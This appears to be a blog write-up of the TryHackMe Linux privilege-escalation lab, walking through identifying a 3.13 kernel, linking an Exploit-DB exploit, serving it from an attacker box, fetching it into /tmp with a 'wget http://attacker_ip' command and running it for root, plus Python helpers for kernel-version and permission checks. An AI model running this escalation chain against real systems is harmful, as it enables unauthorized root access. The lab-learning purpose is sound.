
Kernel Exploits - Linux Privilege Escalation


This post uses the Linux Privilege Escalation room at TryHackMe as its lab: https://tryhackme.com/room/linprivesc

Definition of a kernel: the core component of an operating system, the part that powers and controls the computer system. Every other program, including root's shell, runs on top of it.

You can think of the kernel as a car engine: the engine is the core component that powers and controls the entire vehicle.

Because the kernel is the component that enforces privileges in the first place, controlling it means you effectively have root privileges: you can do anything you want on the system.

The Kernel exploit methodology

  1. Identify the kernel version
  2. Search and find an exploit code for the kernel version of the target system
  3. Run the exploit

Be aware that a failed kernel exploit can crash the target system (a kernel panic takes the whole machine down, not just your shell).

To find exploit code, search the web for the kernel version of the target system followed by the word "exploit". You can also check Exploit-DB to see whether any vulnerabilities have been published for that kernel version. Additional resource: https://www.linuxkernelcves.com/cves

Here are some hints/notes from TryHackMe:

  1. Being too specific about the kernel version when searching for exploits on Google, Exploit-db, or searchsploit

  2. Be sure you understand how the exploit code works BEFORE you launch it.

    Some exploit code makes changes to the operating system that leave it insecure for further use, or makes irreversible changes to the system that create problems later.

    Of course, these may not be great concerns within a lab or CTF environment, but these are absolute no-nos during a real penetration testing engagement.

  3. Some exploits may require further interaction once they are run. Read all comments and instructions provided with the exploit code.

  4. You can transfer the exploit code from your machine to the target system using the SimpleHTTPServer Python module (on your machine) and wget (on the target).

Demonstration

Everything below is done in the lab machine that TryHackMe provides to the user.

In this Kernel Exploits lab, TryHackMe has given us the username and password of the victim machine. The problem is that this user has low privileges. Our job is to gain root access using a kernel exploit. Let's begin.

The first thing we need to do is identify the kernel version the operating system is running. Either of two commands returns the same information: `uname -a` or `cat /proc/version`.

Here is a screenshot of the privileges the user currently has.

Kernel version: `Linux 3.13.0-24-generic`
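As an added example (not part of the original post or the TryHackMe room), here is a small Python helper that pulls the kernel release out of `uname -a` or `/proc/version` output and compares it against a minimum version. The same parsing lets a defender flag hosts that are still running an outdated kernel. The sample outputs below are constructed for the example in the shape of the real commands' output; the hostname `labhost`, the build numbers and the baseline version are placeholders, not values taken from the lab.

```python
import re
from typing import NamedTuple, Optional

# Constructed sample outputs in the shape of `uname -a` and `cat /proc/version`
# for the kernel the post identifies (3.13.0-24-generic). Hostname, build number
# and timestamps are placeholders, not captured from the lab machine.
SAMPLE_UNAME = (
    "Linux labhost 3.13.0-24-generic #46-Ubuntu SMP "
    "Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux"
)
SAMPLE_PROC_VERSION = (
    "Linux version 3.13.0-24-generic (buildd@placeholder) "
    "(gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014"
)


class KernelVersion(NamedTuple):
    major: int
    minor: int
    patch: int
    build: int      # distro ABI/build number after the dash (24 in 3.13.0-24); 0 if absent
    flavour: str    # e.g. "generic"; empty string if absent

    def numeric(self) -> tuple:
        """Comparable tuple; the flavour string is ignored for ordering."""
        return (self.major, self.minor, self.patch, self.build)


# major.minor.patch, optional -build, optional -flavour. The first match wins,
# which is the kernel release in both output formats (gcc's own version comes later).
_VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)(?:-(\d+))?(?:-([A-Za-z0-9]+))?\b")


def parse_kernel_version(text: str) -> Optional[KernelVersion]:
    """Extract the kernel release from `uname -a`, `uname -r` or `/proc/version` text."""
    m = _VERSION_RE.search(text)
    if m is None:
        return None
    major, minor, patch, build, flavour = m.groups()
    return KernelVersion(int(major), int(minor), int(patch), int(build or 0), flavour or "")


def is_older_than(running: KernelVersion, baseline: KernelVersion) -> bool:
    """True when the running kernel predates the baseline (flavour ignored)."""
    return running.numeric() < baseline.numeric()


def check_host(output: str, baseline: KernelVersion) -> str:
    """Classify a host from its `uname -a` output: 'outdated', 'ok' or 'unknown'."""
    running = parse_kernel_version(output)
    if running is None:
        return "unknown"
    return "outdated" if is_older_than(running, baseline) else "ok"


if __name__ == "__main__":
    # Placeholder policy baseline: "nothing older than 3.13.0-100 is acceptable".
    baseline = KernelVersion(3, 13, 0, 100, "")
    print(parse_kernel_version(SAMPLE_UNAME))
    print(check_host(SAMPLE_UNAME, baseline))
```

The comparison deliberately ignores the flavour suffix (`generic`, `aws`, ...) and compares only the numeric parts, so the baseline can be written once for a fleet regardless of which kernel flavour each host boots.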

The next step is to look up the kernel version and see whether any published exploits correspond to it. This is what I found: https://www.exploit-db.com/exploits/37293

Now, I download the exploit onto my attacker box and compile the code.

Next, I transfer the compiled program to the victim machine. One way to do this is with `wget` on the victim and Python's built-in HTTP server on the attacker box.

To start the HTTP server, run this from the directory containing the compiled exploit: `python -m http.server <port>`. It serves that directory to anyone who can reach the port, so stop it as soon as the transfer is done.

A problem suddenly popped up. The current directory I am in is `/` (the root of the filesystem), and it does not allow files to be written. That means we have to find another directory to download our program into.

The next step is to run `ls -al`.

This command shows the permissions on each entry in the current directory. The directory we are in is `/`, the filesystem root. The permissions shown are: `drwx------`

Let's break it down:

`d` stands for directory.

The remaining nine characters split into three groups of three: `|rwx|---|---|`
The first group is the owner, the second group is the group, the third group is others (everyone else).

The owner (root) has read, write and execute; the group has no permissions, and neither do others. That is why I couldn't download the exploit into that directory: my account is karen, so I fall into the others category. Knowing this, we need to find a directory that allows us to write to it. Let's go back to the picture.
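To make the breakdown above concrete, here is a small Python script, added as an example (it is not from the original post or from TryHackMe), that parses the ten-character mode string from `ls -al` and works out which directories a given user could both write to and run a program from. The listing it parses is constructed for the example; `karen` is the low-privilege account the post uses, and her group membership (only her own group) is an assumption.

```python
from dataclasses import dataclass
from typing import List, Sequence

# Constructed `ls -al` output for the example. The `.` entry mirrors the
# drwx------ permissions the post reports for /; the other entries are typical
# values and not captured from the lab machine.
SAMPLE_LS_AL = """\
total 88
drwx------  23 root root  4096 Jun 10 09:00 .
drwxr-xr-x   2 root root  4096 Jun 10 09:00 bin
drwxrwxrwt   8 root root  4096 Jun 10 09:05 tmp
drwxr-x---   5 matt matt  4096 Jun 10 09:00 home_matt
-rw-r--r--   1 root root   500 Jun 10 09:00 notes.txt
"""


@dataclass(frozen=True)
class Perms:
    read: bool
    write: bool
    execute: bool


@dataclass(frozen=True)
class Mode:
    kind: str      # 'd' directory, '-' regular file, 'l' symlink, ...
    owner: Perms
    group: Perms
    others: Perms


def _triple(bits: str) -> Perms:
    r, w, x = bits
    # Lowercase s/t mean setuid/setgid/sticky *with* execute; uppercase S/T without.
    return Perms(r == "r", w == "w", x in ("x", "s", "t"))


def parse_mode(mode: str) -> Mode:
    """Parse a ten-character mode string such as 'drwx------' or '-rw-r--r--'."""
    if len(mode) != 10:
        raise ValueError(f"expected a 10-character mode string, got {mode!r}")
    return Mode(mode[0], _triple(mode[1:4]), _triple(mode[4:7]), _triple(mode[7:10]))


def effective_perms(mode: Mode, owner: str, group: str, user: str, user_groups: Sequence[str]) -> Perms:
    """Pick the single permission class that applies to `user`.

    Unix checks exactly one class: owner if you own the entry, else group if you
    are in its group, else others. A more permissive 'others' field does not
    help the owner. (root bypasses these checks in the kernel; not modelled here.)
    """
    if user == owner:
        return mode.owner
    if group in user_groups:
        return mode.group
    return mode.others


def writable_dirs_for(listing: str, user: str, user_groups: Sequence[str]) -> List[str]:
    """Return directory names in `ls -al` output where `user` may create files and run them.

    On a directory, 'execute' means permission to enter/traverse it, which is
    needed both to write a file into it and to run ./program from inside it.
    """
    result = []
    for line in listing.splitlines():
        if not line or line.startswith("total"):
            continue
        fields = line.split(None, 8)   # mode, links, owner, group, size, month, day, time, name
        if len(fields) < 9:
            continue
        mode = parse_mode(fields[0])
        if mode.kind != "d":
            continue
        perms = effective_perms(mode, fields[2], fields[3], user, user_groups)
        if perms.write and perms.execute:
            result.append(fields[8])
    return result


if __name__ == "__main__":
    print(writable_dirs_for(SAMPLE_LS_AL, "karen", ("karen",)))   # -> ['tmp']
```

Run against the constructed listing, the only directory karen can both write to and execute from is `tmp`, which is exactly what the post finds by reading the `ls -al` output by hand. The same function answers the defender's question in reverse: which world-writable, executable directories exist on a host that an unprivileged account could stage a binary in.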


The directory /tmp caught my eye: its permissions let us read, write and execute (enter) the directory, so that is the directory we are going to use. First, change into /tmp; then download the file with:
`wget http://attacker_ip:port/item_to_download`
Here `attacker_ip` is the address of the machine running the Python HTTP server.

Now, change the permissions on the program so that it can execute: `chmod +x malicious_program`
Then run it with `./malicious_program` (in my run the compiled binary was called `word`, so the command was `./word`).
After running the program, I run `id` to check whether I got root access.

After that, I have to find the file flag1.txt. To find it, I run: `find / -name flag1.txt`

This command starts at `/` and walks the whole filesystem looking for flag1.txt, printing the path of each match. The file is at: `/home/matt/flag1.txt`. Now, all I have to do is run `cat /home/matt/flag1.txt` and I should have the flag.

Flag: `THM-28392872729920`

Important lesson:
- When transferring the exploit to the victim machine, make sure the directory you are downloading (writing) to gives you write permission and also lets you execute the program from it. From the defender's side, this is exactly why world-writable directories such as /tmp are often mounted with the `noexec` option.

That is all for my post. Thanks for reading.